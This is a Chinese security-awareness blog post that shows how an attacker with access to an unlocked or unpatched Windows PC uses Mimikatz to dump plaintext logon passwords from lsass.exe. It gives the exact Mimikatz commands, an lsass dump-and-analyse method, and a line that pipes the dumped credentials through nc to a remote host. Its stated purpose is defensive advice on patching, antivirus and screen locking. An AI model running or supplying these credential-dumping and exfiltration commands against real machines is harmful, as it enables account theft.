Mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码
mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。
主页:https://blog.gentilkiwi.com/mimikatz
假设是一位毫无安全意识的员工,离开电脑未锁屏,他的电脑也属于纯裸奔(啥安全软件也不装)的情况,我们看看这种场景到底有多危险?
这里模拟攻击者,社工方式(假设借用一下电脑)进行社工
在电脑上下载mimikatz和nc等工具
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
浏览器下载mimikatz工具后,管理员身份运行命令行,使用mimikatz工具
获取登录密码
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full
可以看到Password :Windows@2022
(图片点击放大查看)
(图片点击放大查看)
同样假设这台Win7安装完之后未打永恒之蓝安全补丁,也没有装杀毒安全防护软件,只是锁屏
下面为kali机器使用msf攻击框架上传mimikatz获取开机密码的简单过程截图
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
所以打补丁,安装安全防护软件还是非常重要的!
隔离区,信任区也设置安全操作密码
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
不建议使用浏览器自动托管你的密码。
不上传mimikatz,这样不用解决杀毒软件拦截的问题,直接导出lsass.exe的dump文件
并上传到自己的电脑,本地使用mimikatz进行分析
Mimikatz.exe
sekurlsa::minidump D:\lsass.DMP
sekurlsa::logonpasswords
(图片点击放大查看)
(图片点击放大查看)
(图片点击放大查看)
当然mimikatz的其他用法还有很多,另外很多mimikatz的免杀工具,自行百度科普
导出成文件:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> d:\soft\mimikatz_output.txt
nc方式回传:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" | nc -vv 192.168.31.230 4444
人是信息安全意识中最薄弱的环节。安全技术和产品无法保护每一个人远离每一种可能存在的安全风险
如果还在用Win7,赶紧给自己电脑上的杀毒软件配置退出密码吧!
本文分享自 WalkingCloud 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!